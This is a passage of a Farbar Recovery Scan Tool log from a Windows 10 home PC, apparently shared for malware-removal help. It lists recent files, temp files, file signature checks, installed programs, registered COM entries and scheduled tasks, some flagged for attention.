2016-04-14 21:15 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-04-14 21:15 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-04-14 21:15 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-04-14 21:15 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-04-14 20:28 - 2015-10-30 08:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-14 20:21 - 2015-08-25 23:20 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-14 20:11 - 2010-07-05 12:15 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-14 19:50 - 2015-09-25 22:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\Packages
2016-04-14 19:49 - 2015-02-04 23:29 - 00003948 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1423088991
2016-04-14 19:49 - 2015-02-04 23:29 - 00001127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-04-14 19:49 - 2014-08-16 17:22 - 00000000 ____D C:\Program Files (x86)\Opera
2016-04-10 16:23 - 2010-06-26 18:35 - 00000846 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job
2016-04-06 19:32 - 2015-10-30 08:26 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 19:32 - 2015-10-30 08:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-04 20:16 - 2015-12-18 05:15 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-26 23:17 - 2014-04-20 14:49 - 00000000 ____D C:\Program Files (x86)\Vuze

==================== Files in the root of some directories =======

2015-02-06 17:04 - 2015-02-06 17:04 - 0000132 _____ () C:\Users\Administrator\AppData\Roaming\Adobe BMP Format CS6 Prefs
2016-02-29 00:17 - 2016-02-29 02:13 - 0015888 _____ () C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml
2016-02-29 00:17 - 2016-02-29 02:13 - 0127488 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
2013-08-29 20:41 - 2014-04-06 20:44 - 0006144 _____ () C:\Users\Administrator\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

Some files in TEMP:
====================
C:\Users\Administrator\AppData\Local\Temp\amisetup0622__15905.exe
C:\Users\Administrator\AppData\Local\Temp\amisetup0723__15905.exe
C:\Users\Administrator\AppData\Local\Temp\bowbu3v8.dll
C:\Users\Administrator\AppData\Local\Temp\boxnox.exe
C:\Users\Administrator\AppData\Local\Temp\Execute2App.exe
C:\Users\Administrator\AppData\Local\Temp\i4jdel0.exe
C:\Users\Administrator\AppData\Local\Temp\ICReinstall_landmine-goes-click-eng-6431036.exe
C:\Users\Administrator\AppData\Local\Temp\libeay32.dll
C:\Users\Administrator\AppData\Local\Temp\msvcp90.dll
C:\Users\Administrator\AppData\Local\Temp\msvcr120.dll
C:\Users\Administrator\AppData\Local\Temp\msvcr90.dll
C:\Users\Administrator\AppData\Local\Temp\sqlite3.dll
C:\Users\Administrator\AppData\Local\Temp\Y0LIE0MHNS.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-04-23 19:55

==================== End of FRST.txt ============================

[boutek]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-04-2016
Ran by Administrator (2016-04-25 20:06:49)
Running from C:\Users\Administrator\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-18 04:43:06)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-4246815794-1745546178-596238576-500 - Administrator - Enabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-4246815794-1745546178-596238576-503 - Limited - Disabled)
Guest (S-1-5-21-4246815794-1745546178-596238576-501 - Limited - Disabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-4246815794-1745546178-596238576-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.2.8870 - Adobe Systems Inc.)
Adobe Flash Player 19 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.15) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.15 - Adobe Systems Incorporated)
AirStream-Suite (HKLM-x32\...\{734D87EE-15DC-49C9-943E-605E9B55A5D8}) (Version: 5.4.4 - )
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 11.1.2253 - AVAST Software)
Bluesoleil 5.4.277.0 (HKLM\...\{FBBAB883-0BEE-4744-8062-281B213ADC1E}) (Version: 5.4.277.0 - IVT Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.14 - Piriform)
Chromium (HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Chromium) (Version: 50.0.2632.0 - Chromium)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
DameWare Development Mirror Driver 64 Uninstall (HKLM\...\DamewareMirror) (Version: - )
Dropbox (HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\Dropbox) (Version: 3.18.1 - Dropbox, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 50.0.2661.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HDMI Control Manager (HKLM-x32\...\InstallShield_{63DA1F6A-2E65-4367-99B9-9E39FADEC446}) (Version: 2.0 - TOSHIBA CORPORATION)
HDMI Control Manager (Version: 2.0 - TOSHIBA CORPORATION) Hidden
HDMI Control Manager (x32 Version: 2.0 - TOSHIBA CORPORATION) Hidden
iCare Data Recovery (HKLM-x32\...\{43D63B27-661F-428E-97B7-70D0604D28E8}_is1) (Version: 7.8.2 - iCare Recovery)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.0.1037 - Intel Corporation)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.34.2 - JMicron Technology Corp.)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 365 Small Business Premium - en-us (HKLM\...\O365SmallBusPremRetail - en-us) (Version: 15.0.4815.1001 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Opera Stable 36.0.2130.65 (HKLM-x32\...\Opera 36.0.2130.65) (Version: 36.0.2130.65 - Opera Software)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Readon TV Movie Radio Player 7.6.0.0 (HKLM-x32\...\{80074966-5231-428D-9AE7-B7D5D2DC3246}) (Version: 7.6.0 - Readon Technology)
Realtek Ethernet Controller Driver For Windows Vista and Later (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5928 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}) (Version: 2.00.0006 - Realtek)
Remote Mouse version 2.702 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.702 - Remote Mouse)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16035.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16035.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.59.0 - Samsung Electronics Co., Ltd.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Southpark Stick of Truth (HKLM-x32\...\U291dGhwYXJrU3RpY2tvZlRydXRo_is1) (Version: 1 - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
System Requirements Lab Detection (HKLM-x32\...\{A407FC22-36BF-4C82-A516-59D94BC505A9}) (Version: 1.0.5.0 - Husdawg, LLC)
TOSHIBA ConfigFree (HKLM-x32\...\{F3529665-D75E-4D6D-98F0-745C78C68E9B}) (Version: 8.0.25 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.1.07-A - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.4C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.16C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.3 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.4 - TOSHIBA Corporation)
Toshiba Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.00 - TOSHIBA)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.5.6.64 - TOSHIBA Corporation)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 x64 - TOSHIBA Corporation)
TOSHIBA Recovery Media Creator Reminder (HKLM-x32\...\InstallShield_{773970F1-5EBA-4474-ADEE-1EA3B0A59492}) (Version: 1.00.0019 - TOSHIBA)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.3.2.0 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.9 - TOSHIBA Corporation)
TRORMCLauncher (HKLM-x32\...\InstallShield_{E65C7D8E-186D-484B-BEA8-DEF0331CE600}) (Version: - )
TRORMCLauncher (Version: 1.0.0.9 - TOSHIBA) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Utility Common Driver (x32 Version: 1.0.50.27C - TOSHIBA) Hidden
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM-x32\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.3.0.0 - Azureus Software, Inc.)
Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
Wolfenstein (x32 Version: 1.0 - Activision) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-4246815794-1745546178-596238576-500_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Administrator\AppData\Roaming\Dropbox\bin\DropboxExt64.30.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00D9829D-3BB1-4081-A7D4-B810499EC541} - System32\Tasks\Opera scheduled Autoupdate 1423088991 => C:\Program Files (x86)\Opera\launcher.exe [2016-04-11] (Opera Software)
Task: {08981218-72F4-49C9-97AA-3F5E37CAEB9B} - System32\Tasks\{09B27912-9A43-4FF7-BD30-57630748A883} => C:\Users\Administrator\Desktop\Killer_Instinct_Gold.exe
Task: {0BF7B5EA-2A57-478E-ADBD-F7F2335C49DF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {15B3C99C-441D-4307-9EED-81FF4235CABA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {186D32FA-F97C-47FB-97F6-736F8F776B36} - System32\Tasks\{D1BBCD9B-168D-4276-A916-0F5F8245D950} => pcalua.exe -a C:\ProgramData\DivX\Setup\DivXSetup.exe -c /uninstall /bundleGroupId divx.com
Task: {21431663-23D7-40F6-A415-22673F2E0617} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {21A6F611-E4CA-4E1E-9832-7133DC62CF89} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {24D2CEAB-ED2E-4B9F-AAE2-8AECBD6D9F1F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {260CCA0A-B0E4-4D79-88A1-F14E7F519FAC} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2016-01-15] (Piriform Ltd)
Task: {28E669F9-44D9-4BB3-ACB1-5C8042FEFEA7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-19] (Dropbox, Inc.)
Task: {31A0B560-2F6A-4A78-90F7-8F9EC6C51153} - System32\Tasks\{5F88DBBA-CDE8-4AE1-85F9-20A0392DFCA9} => C:\Program Files (x86)\Skype\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.)
Task: {3338E8A2-41E8-48F3-B771-DF917BA886FF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {3A980C6B-EA6A-4300-A9F1-FB6DFB1FD276} - System32\Tasks\{794D2B9A-6983-4A27-B006-03C4BF798CCF} => pcalua.exe -a J:\setup.exe -d J:\
Task: {3D7B0ACF-A7CA-4DBC-AF76-23CCD96420CD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe [2010-06-26] (Google Inc.)
Task: {3E723A07-ADAE-49AD-ACE4-ECCE877BFD74} - System32\Tasks\{33D6D88F-312B-4AF6-B7C2-11F80ACE0423} => Chrome.exe
Task: {4B3F8A78-73D8-41DA-9C9A-CA3F1BD70233} - System32\Tasks\{ED6CA3B1-DD85-4B52-8D35-7A4E561D8EE4} => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2009-11-21] (TOSHIBA CORPORATION.)
Task: {4B695E67-D0FD-420F-ACC4-45DD4D3DBA53} - System32\Tasks\{5527599E-4D2B-4E27-BC45-DD9ECF58BB16} => C:\Users\Administrator\Desktop\Killer_Instinct_Gold.exe
Task: {4C3294AF-E1B0-4DB5-AECD-86FFD9C02BD9} - System32\Tasks\{658EBFDD-0FA9-428F-AB19-0C8C1A749E40} => pcalua.exe -a C:\Users\Administrator\Desktop\verypdf-free-txt2pdf.exe -d C:\Users\Administrator\Desktop
Task: {4C4E2760-7F69-424E-B358-1555749C68A2} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_19_0_0_185_pepper.exe [2015-09-21] (Adobe Systems Incorporated)
Task: {56BEF496-DE23-4FC9-B86F-9168B79EA5DD} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {57C20DD6-8BB6-46DF-87CE-1095EEB1DC7B} - System32\Tasks\{6FAE5151-0CA3-4E2E-A01B-A5D9FCCAA8A6} => Chrome.exe
Task: {5CA4C754-7EC0-4126-97AE-4BDED30FF830} - System32\Tasks\{5BACAC0C-665F-48C9-8C6D-BC6C6F14CBEE} => pcalua.exe -a "M:\Adobe Photoshop CS4 Extended Edition\Photoshop CS4 Install\payloads\AdobeAIR1.0\AdobeAIRInstaller.exe" -d "C:\Program Files (x86)\Common Files\Adobe\Installers\faf656ef605427ee2f42989c3ad31b8" -c -silent
Task: {5CB7EB51-105F-4371-A605-40287949AB36} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2016-02-19] (AVAST Software)
Task: {5DEA4054-A452-40D0-AAFE-7C072CCCC819} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-14] (Microsoft Corporation)
Task: {69AC9BBD-9EB4-4F3B-8F18-9E52ECE2BF73} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {712FAA8C-672B-45F6-9333-FAA80D7848A3} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-19] (Dropbox, Inc.)
Task: {75C1AC0E-E49E-4B1C-84A0-FAF974825FDC} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
